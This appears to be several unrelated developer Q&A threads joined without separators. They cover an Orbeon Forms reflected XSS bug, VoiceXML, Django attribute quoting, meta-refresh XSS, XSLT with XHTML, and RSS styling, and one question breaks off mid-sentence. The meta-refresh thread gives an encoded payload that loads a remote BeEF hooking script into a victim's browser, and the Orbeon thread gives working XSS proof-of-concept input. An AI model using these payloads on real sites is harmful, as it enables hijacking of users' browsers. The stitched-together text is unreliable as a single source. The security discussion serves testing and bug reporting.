While testing Orbeon Forms for reflected cross-site scripting (XSS) vulnerabilities (https://en.wikipedia.org/wiki/Cross-site_scripting#Reflected_.28non-persistent.29), we noticed that it is possible to pass request parameters containing script tags, which can then be output using xf:output.
Shouldn't Orbeon validate (or at least sanitize) request parameters when they are retrieved with xxf:get-request-parameter(), or when they are output with xf:output, to prevent this kind of security vulnerability?
I tested this with the latest version of Orbeon (orbeon-2016.3.201612302139-CE) in a Jetty container.
Note that you cannot reproduce this with Tomcat, since it performs its own validation of request parameters, nor with Chrome, because it sanitizes the output for you (stripping the script content).
A small sample form that demonstrates this:
<html xmlns="http://www.w3.org/1999/xhtml"
      xmlns:xh="http://www.w3.org/1999/xhtml"
      xmlns:xf="http://www.w3.org/2002/xforms"
      xmlns:xxf="http://orbeon.org/oxf/xml/xforms">
    <head>
        <title>Reflected XSS</title>
        <xf:model>
            <xf:instance id="default">
                <root xmlns=""/>
            </xf:instance>
            <xf:var name="testvar" value="xxf:get-request-parameter('test')"/>
        </xf:model>
    </head>
    <body>
        <p>This is an example to show that Orbeon is vulnerable to Reflected Cross Site Scripting attacks.</p>
        <p>Access this form and pass a request parameter with some JavaScript, like: /?test=bla%00rje1w<script>alert(1)<%2fscript></p>
        <p><xf:output value="$testvar"/></p>
    </body>
</html>
This turned out to be a bug related to HTML serialization. The issue is now fixed.
Separately, we can think more about whether sanitization of request parameters is needed, including rejecting or removing character #x00. Form data itself should be covered, because it comes in via XML requests, and XML explicitly disallows this (and a few other) characters.
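For reference, the XML 1.0 Char production only permits the following ranges, so #x00 (and most other control characters) can never appear in a well-formed document:
Char ::= #x9 | #xA | #xD | [#x20-#xD7FF] | [#xE000-#xFFFD] | [#x10000-#x10FFFF]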
How can I call a web service from a VoiceXML (VXML) document? I am using an open-source IVR project, and I need to call a web service for a given option from within the VXML document.
This is similar to this query:
how can I call a webservice from voiceXML?
However, a solution is provided there but it is not
You cannot call a web service directly from a VoiceXML application. There are generally two approaches for getting data into a VoiceXML application (a sketch of both follows this list):
Use the data element to make an HTTP request. The result must be XML, and you will need to parse it with the provided DOM functions. Note that some browsers have extended features to facilitate XML parsing. This approach also requires a VoiceXML 2.1 compliant browser.
Transfer control to a dynamic piece of server code that returns VoiceXML which populates your desired variables. This can be done with a goto element or a subdialog element.
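A minimal sketch of both approaches (the URLs, IDs, and variable names are placeholders, and a VoiceXML 2.1 browser is assumed for the data element):
<vxml version="2.1" xmlns="http://www.w3.org/2001/vxml">
    <form id="lookup">
        <!-- Approach 1: fetch XML directly; "result" becomes a DOM document
             that you walk with the browser's DOM functions -->
        <block>
            <data name="result" src="http://example.com/service.xml" method="get"/>
        </block>
        <!-- Approach 2: transfer control to server code that returns VoiceXML
             which assigns the variables you need -->
        <subdialog name="answer" src="http://example.com/dynamic-dialog.vxml"/>
    </form>
</vxml>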
Your question is incomplete, but I suspect I know what's bothering you.
I get information from a webservice by using
<data name="return_data" srcexpr="some_url" method="post" namelist="var1 var2 var3" />
The data I get back is inside the return_data variable. In my case, the data are in XML format, and I use JavaScript functions to extract the data I need.
As an aside, for maintainability, re-usability, and ease of reading, I personally find it useful to put the JS functions in separate files and include them via <script> in my root VoiceXML document.
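For example, at the document level of the root VoiceXML file (the file name here is just an illustration):
<script src="webservice-helpers.js"/>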
Since HTML5 does not require attribute values to be enclosed in double quotes, I used to skip them for the sake of simplicity. For example, I use:
<a href=/someURL/someArgs/>Link to some URL</a>
instead of
<a href="/someURL/someArgs/">Link to some URL</a>
However, I happened to read a document written by a security hacker, who indicates that if the URL is supplied by Django templates, there may be security problems. That is,
<a href={{ someURL }}>Link to some URL</a> <!-- Unsafe -->
<a href="{{ someURL }}">Link to some URL</a> <!-- Safe -->
Is that true? What kinds of security problems are there?
In my opinion, both usages provide a similar opening for inserting malicious code. It all depends on whether you always control what ends up in "someURL" or whether it is based on input from your web user.
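For illustration, the problem usually cited for the unquoted form is attribute injection (the payload below is hypothetical, and Django's autoescaping is assumed to be on). A value containing spaces can add new attributes without needing any quote characters, which autoescaping does not prevent; in the quoted form, the attacker must break out with a literal ", which autoescaping encodes as &quot;:
<!-- Suppose someURL = "/ onmouseover=alert(1)" -->
<a href=/ onmouseover=alert(1)>Link to some URL</a>   <!-- new attribute injected -->
<a href="/ onmouseover=alert(1)">Link to some URL</a> <!-- payload stays inside href -->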
A professional pentester told me this XSS test vector is useless for a pentest. The payload looks like this (the data: URI decodes to <script>alert(1)</script>):
<meta http-equiv="refresh" content="0; url=data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E">
But when I save the code to an HTML file with a more powerful JavaScript payload, like hook.js from the BeEF exploit framework (the data: URI below decodes to a script that document.write()s a remote <script> tag):
<meta http-equiv="refresh" content="0; url=data:text/html,%3C%73%63%72%69%70%74%3E%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%36%30%2C%31%31%35%2C%39%39%2C%31%31%34%2C%31%30%35%2C%31%31%32%2C%31%31%36%2C%33%32%2C%31%31%35%2C%31%31%34%2C%39%39%2C%36%31%2C%31%30%34%2C%31%31%36%2C%31%31%36%2C%31%31%32%2C%35%38%2C%34%37%2C%34%37%2C%31%31%32%2C%31%30%38%2C%31%30%31%2C%39%38%2C%31%31%35%2C%34%36%2C%31%30%39%2C%31%30%31%2C%34%37%2C%34%38%2C%34%36%2C%31%30%36%2C%31%31%35%2C%36%32%2C%36%30%2C%34%37%2C%31%31%35%2C%39%39%2C%31%31%34%2C%31%30%35%2C%31%31%32%2C%31%31%36%2C%36%32%29%29%3C%2F%73%63%72%69%70%74%3E">
it works perfectly in Firefox and Chrome. I can see the victim online in my BeEF console, and a lot of its functionality is available.
I don't really get it. What's wrong with this payload? I have asked him several times, but there has been no response, and it confuses me. Can anybody tell me why he said this vector is useless for a pentest?
XSS through a meta tag is highly dependent on the browser used by the target victim. A meta tag such as <meta http-equiv="refresh" content="0;url=javascript:alert(1)"> will fire malicious JavaScript on the hosting domain, but it only works in Safari; all other browsers refuse to follow a javascript: URL from a refresh or Location header.
When a data: URI is used in the tag, the browser loads the decoded payload into a null origin, so any JavaScript fires in the context of that null origin. While this can still be used to fire redirects, XHR, and other such attacks, it is useless for accessing anything on the hosting domain. This attack also won't work in IE, since IE only allows data: URIs for image-type elements, and I think even that is restricted to style/CSS.
So although meta tag injections are only successful for XSS in a very limited capacity, they are still very dangerous in other attacks and are worth testing.
As far as I remember, data: URIs are loaded as a separate origin, so you cannot access the vulnerable site from the injected script. However, this could be used to deliver an exploit or for phishing, so I wouldn't call it totally useless.
I have a large number of HTML files that I need to process with XSLT, using an XML file to choose which HTML files to process and what to do with them.
I tried:
Use HTML Tidy to convert HTML -> XHTML / XML
Use document(filename) in XSLT to read in particular XHTML/XML files
...use standard nodeset commands to access e.g. "html/body/*"
This doesn't work, because:
It seems that XSLT (tried: libXSLT/xsltproc ... and Saxon) cannot process XHTML documents as external files (it sees the xhtml DOCTYPE, and refuses to parse it as nodes).
Fine (I thought) ... XHTML is just XML, I just need to put it through HTML Tidy and say:
"output-xml yes ... output-html no ... output-xhtml no"
...but HTML Tidy ignores you if you attempt that, and forces html instead :(. It seems to be hardcoded to only output XML files if the input was XML to begin with.
Any ideas for how to:
Force HTML Tidy to obey the command-line parameters, and set the doctype I asked for
Force XSLTproc to parse xhtml DOCTYPEs as xml
...some other cunning way that will work?
NB: this has to work on OS X - it's part of a build process for iOS apps. That shouldn't be a big problem, but e.g. any windows-only tools aren't available. I'd like to achieve this with standard open-source cross-platform tools (like tidy, libxslt, etc)
I finally discovered why xsltproc / Saxon were refusing to parse the files when they were passed in with a DOCTYPE of html:
The DOCTYPE of the external document alters how they interpret the xmlns (namespace) declaration. Tidy was (correctly) declaring xmlns="...the xhtml namespace..." - so, inside my XSLT, all my node names were, I don't know, non-existent? XSLT was ignoring them as if they didn't exist; it needed me to provide a compatible mapping to the same namespace.
Strangely, if the DOCTYPE was xml, they happily ignored the xmlns declaration - or rather, they allowed me to reference nodes by unqualified name. This fooled me into thinking they were point-blank ignoring the nodesets inside the xhtml-DOCTYPE'd version.
So, the "solution" is something like this:
modify your XSLT stylesheet to ALSO declare the "xhtml" namespace - NB: this is required so that you can reference the nodes in the external files
write all your XSL match / select / template rules with the "xhtml" prefix on every node (and, I think, on every attribute?) - an example template rule follows the code below
let Tidy output whatever it wants: it doesn't matter, it'll Just Work once you have the namespace support in there
Example code:
Your stylesheet goes from this:
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
...to this:
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:xhtml="http://www.w3.org/1999/xhtml">
Your select / match / document-import goes from this:
<xsl:copy-of select="document('html-files/file1.htm')/html/body"/>
...to this:
<xsl:copy-of select="document('html-files/file1.htm')/xhtml:html/xhtml:body"/>
NB: just to be clear: if you ignore namespaces, it seems XSLT will work on files that are un-DOCTYPE'd, even if they have a namespace in them. Don't make the mistake I made of thinking your XSLT is correct just because it appears to be :)
XHTML is XML (if it is valid).
To get your XHTML processed as XML, you must not serve it with the "text/html" MIME type. Use application/xhtml+xml instead (keep in mind that IE6 cannot render this and will prompt a download window for your site).
In PHP, you serve it as xhtml+xml with the header() function.
I think this should do the trick:
header('Content-Type: application/xhtml+xml');
Does this help?
If you run xsltproc --help, among the accepted input flags is a very conspicuous one called --html, which supposedly tells xsltproc that:
--html: the input document is(are) an HTML file(s)
Presumably for this to work you must have valid HTML files to begin with, though. So you might want to tidy them up first.
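So an invocation along these lines might work directly on the HTML (the file names are placeholders):
xsltproc --html mystylesheet.xsl input.html > output.xml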
I think the main problem is caused by the doctype declaration being resolved through the XML catalog. You can test this by removing the external entity reference from the input XHTML and seeing whether the processor then works correctly with it.
I would do as follows:
Use Tidy with the doctype omit option.
Add the DOCTYPE on the XSLT side, as described here (see the example below).
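For the second step, that would be an xsl:output declaration along these lines (assuming XHTML 1.0 Transitional is the DOCTYPE you want):
<xsl:output method="xml"
    doctype-public="-//W3C//DTD XHTML 1.0 Transitional//EN"
    doctype-system="http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"/>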
The main problem is that Saxon and xsltproc have no option to disable external entity resolution. This is supported by the MSXSL.exe command-line utility with the -xe option.
It's been a while, but I remember trying to use HTMLTidy to prep HTML files for XSLT and was disappointed by how easily it gave up while trying to "well form" the HTML. Then I found TagSoup, and was very pleased.
TagSoup also includes a command-line processor that reads HTML files and can generate either clean HTML or well-formed XML that is a close approximation to XHTML.
I don't know if you're bound to HTMLTidy, but if not try this: http://home.ccil.org/~cowan/tagsoup/
As an example, here's a bad HTML file:
<body>
<p>Testing
</body>
And here's the tagsoup command and its output:
~ zyoung$ java -jar /usr/local/tagsoup-1.2.jar --html bad.html
src: bad.html
<html><body>
<p>Testing
</p></body></html>
Edit 01
Here is how tagsoup handles DOCTYPEs.
Here's a bad HTML file with a valid DOCTYPE:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<body>
<p>Testing
</body>
</html>
Here's how tagsoup handles it:
~ zyoung$ java -jar /usr/local/tagsoup-1.2.jar --html bad.html
src: bad.html
<html><body>
<p>Testing
</p></body></html>
It isn't until you explicitly pass a DOCTYPE to tagsoup that it attempts to output one:
~ zyoung$ java -jar /usr/local/tagsoup-1.2.jar --html --doctype-public=html bad.html
src: bad.html
<!DOCTYPE PUBLIC "html" "">
<html><body>
<p>Testing
</p></body></html>
I hope this helps,
Zachary
Back in about 2006, I wrote a nice XSLT that transformed my RSS feeds into custom HTML. That way if a user clicked from a browser it would display as a simple page rather than a bunch of junk XML. If that same URL was used in a feed reader it was handled properly and everything was slick.
Nowadays, most browsers (IE, Firefox, Safari, Opera) seem to grab hold of the styles and won't let go. And Chrome just plain ignores the stylesheet transformation.
Given that it has been several years, am I simply forgetting some detail? Didn't it used to just be this easy?
<?xml version="1.0" encoding="utf-8"?>
<?xml-stylesheet type="text/xsl" href="/atom2html.xslt"?>
<feed xmlns="http://www.w3.org/2005/Atom">
<!-- ... -->
</feed>
Anyone know if there is a way to override those browsers with very specific ideas of feed styling? And is there any way to get something nice out of Chrome?
Chrome appears to apply the XSLT processing instruction only if the Content-Type of the feed response is set to a generic XML type, not the Atom type.
This displays XSLT in Chrome:
Content-Type: application/xml
This does not display any styling (even though it is technically the more correct type):
Content-Type: application/atom+xml
It is now the default behaviour for most browsers to apply their own styling to any Atom/RSS feed they come across, which is very annoying. A feed is identified through the application/atom+xml MIME type for Atom and application/rss+xml for RSS.
You used to be able to circumvent this by filling the first 512 bytes of the feed with crud in the form of a comment. This would throw off the browser's feed sniffing and allow you to apply your own XSL stylesheet. That worked for years for me, but with IE8 this behaviour has gone out of the window, and the 512-byte comment doesn't work anymore. I have now switched over to server-side processing, but I still lament this decision by browser makers.
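For the record, the trick looked roughly like this (a sketch; the comment text is arbitrary and just has to push the feed's real content past the first 512 bytes):
<?xml version="1.0" encoding="utf-8"?>
<?xml-stylesheet type="text/xsl" href="/atom2html.xslt"?>
<!-- padding padding padding padding padding padding padding padding
     (repeat until this comment alone is longer than 512 bytes,
     defeating the browser's feed sniffing) -->
<feed xmlns="http://www.w3.org/2005/Atom">
  <!-- ... -->
</feed>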
I'm not aware of a way to fool IE & FF & Safari's automatic display of RSS/Atom feeds, but in Chrome the XSLT is correctly applied via the xml-stylesheet processing instruction; here is an example from the Randonneur Group pool at flickr.